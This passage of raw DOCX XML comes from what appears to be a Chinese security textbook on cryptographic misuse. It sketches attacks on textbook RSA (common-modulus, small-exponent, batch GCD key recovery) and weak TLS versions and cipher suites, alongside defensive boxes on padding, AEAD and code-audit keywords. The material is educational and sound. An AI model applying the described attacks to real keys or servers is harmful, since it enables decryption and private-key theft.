      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:sSub>
          <m:e>
            <m:r>
              <m:t>e</m:t>
            </m:r>
          </m:e>
          <m:sub>
            <m:r>
              <m:t>1</m:t>
            </m:r>
          </m:sub>
        </m:sSub>
        <m:r>
          <m:rPr>
            <m:sty m:val="p"/>
          </m:rPr>
          <m:t>,</m:t>
        </m:r>
        <m:sSub>
          <m:e>
            <m:r>
              <m:t>e</m:t>
            </m:r>
          </m:e>
          <m:sub>
            <m:r>
              <m:t>2</m:t>
            </m:r>
          </m:sub>
        </m:sSub>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">加密，攻击者可利用扩展欧几里得算法恢复</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>m</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。此类部署多因管理懒惰或误解。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">原理</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">①：所有这些误用的共同根源是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">违反</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> RSA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">安全模型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：RSA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">底层数学只提供单向陷门函数，必须通过适当的填充和协议构造才能成为语义安全的加密方案或抗伪造的签名方案。回指</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CM5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RSA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">数论推导，这里不再重复底层的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>d</m:t>
        </m:r>
        <m:r>
          <m:rPr>
            <m:sty m:val="p"/>
          </m:rPr>
          <m:t>=</m:t>
        </m:r>
        <m:sSup>
          <m:e>
            <m:r>
              <m:t>e</m:t>
            </m:r>
          </m:e>
          <m:sup>
            <m:r>
              <m:rPr>
                <m:sty m:val="p"/>
              </m:rPr>
              <m:t>−</m:t>
            </m:r>
            <m:r>
              <m:t>1</m:t>
            </m:r>
          </m:sup>
        </m:sSup>
        <m:r>
          <m:t> </m:t>
        </m:r>
        <m:r>
          <m:rPr>
            <m:sty m:val="p"/>
          </m:rPr>
          <m:t>(</m:t>
        </m:r>
        <m:r>
          <m:rPr>
            <m:sty m:val="p"/>
          </m:rPr>
          <m:t>mod</m:t>
        </m:r>
        <m:r>
          <m:t> </m:t>
        </m:r>
        <m:r>
          <m:t>ϕ</m:t>
        </m:r>
        <m:d>
          <m:dPr>
            <m:begChr m:val="("/>
            <m:sepChr m:val=""/>
            <m:endChr m:val=")"/>
            <m:grow/>
          </m:dPr>
          <m:e>
            <m:r>
              <m:t>n</m:t>
            </m:r>
          </m:e>
        </m:d>
        <m:r>
          <m:rPr>
            <m:sty m:val="p"/>
          </m:rPr>
          <m:t>)</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">推导，重点强调其应用约束。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（强制）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者视角</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：利用教科书</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RSA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的同态性、确定性实施选择密文攻击；利用小</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>e</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和猜解消息范围的小消息攻击；利用扫描到的公钥</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GCD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击恢复私钥。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">正确实践</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：永远使用标准库提供的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RSA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">加密/签名函数，并明确指定填充模式：加密用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RSA-OAEP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（具有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SHA-256 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SHA-384 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">哈希），签名用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RSA-PSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或至少</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PKCS#1 v1.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（只在对遗留兼容性要求极高时使用，但需理解其安全性），绝不使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RSA/ECB/NoPadding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。密钥长度至少</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2048 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">位，推荐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3072 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">位。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">密钥管理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：每个实体独立生成自己的模数，严禁共享</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>n</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：对公开的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RSA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">公钥进行批量</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GCD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描，检查是否存在共享素因子。在代码审计中，搜索</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RSA/None</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">NoPadding</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RSA/ECB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（Java）等关键字，并检查密钥长度。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="255"/>
    <w:bookmarkStart w:id="256" w:name="aead一劳永逸的认证加密"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">AEAD：一劳永逸的认证加密</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上述对称加密的误用多数源于混淆“加密”与“认证”。攻击者即便无法解密，也可能篡改密文或通过观察密文行为获取信息。现代安全实践要求使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">认证加密（AEAD）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，同时提供机密性、完整性和真实性。AEAD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模式内置了消息认证码，加密时生成认证标签，解密前校验，一旦密文被篡改立即拒绝。推荐的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AEAD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">算法包括</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">AES-GCM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（基于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CTR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">加密与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GHASH </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">认证）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ChaCha20-Poly1305</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（移动端友好，软件实现快）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">AES-CCM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（受限环境）。使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AEAD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后，ECB、CBC+HMAC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的轮子不再需要，也消除了固定</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IV </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">被利用的空间（只要</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nonce </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">唯一）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（强制收口）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">应用程序密码学选择</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：运用现有库的高层</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">时，优先选择</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">AES/GCM/NoPadding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（Java）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">crypto/aes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">gcm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（Go）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cryptography.hazmat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">AEAD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（Python）、Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Crypto API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">AES-GCM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">TLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">对应</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：TLS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">强制使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AEAD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">套件（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">TLS_AES_128_GCM_SHA256</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），移除全部非</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AEAD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模式，应优先部署。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="256"/>
    <w:bookmarkStart w:id="257" w:name="tls-配置弱点协议版本与密码套件退化"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">配置弱点：协议版本与密码套件退化</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是应用最广的安全信道协议，但其安全性高度依赖服务端与客户端协商出的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">协议版本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">密码套件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。配置不正确会导致连接可被降级至弱加密甚至明文。这些弱点多属于环境/版本相关</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②，但原理明确。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">过期协议版本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：SSL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.0、TLS 1.0、TLS 1.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">均存在已知协议设计缺陷（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">BEAST、POODLE、Lucky13），已被</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RFC 8996 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">正式弃用。若服务器仍然支持这些版本，中间人攻击者可强制降级到脆弱版本进行攻击。TLS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">目前仍广泛使用且安全，前提是配置强套件；TLS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是当前最安全的版本，它删除了静态</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RSA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">密钥交换、完全采用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">AEAD，并精简握手。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">弱密码套件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：包括但不限于以下类别：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">基于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RC4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的套件：RC4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">流密码存在统计偏差，可被恢复部分明文。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">基于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CBC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模式的套件（尤其结合</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TLS 1.0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">时）：易受</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BEAST、POODLE、Lucky13 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等时间侧信道或明文注入攻击。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">使用空加密或弱认证的套件：如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">TLS_RSA_WITH_NULL_SHA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
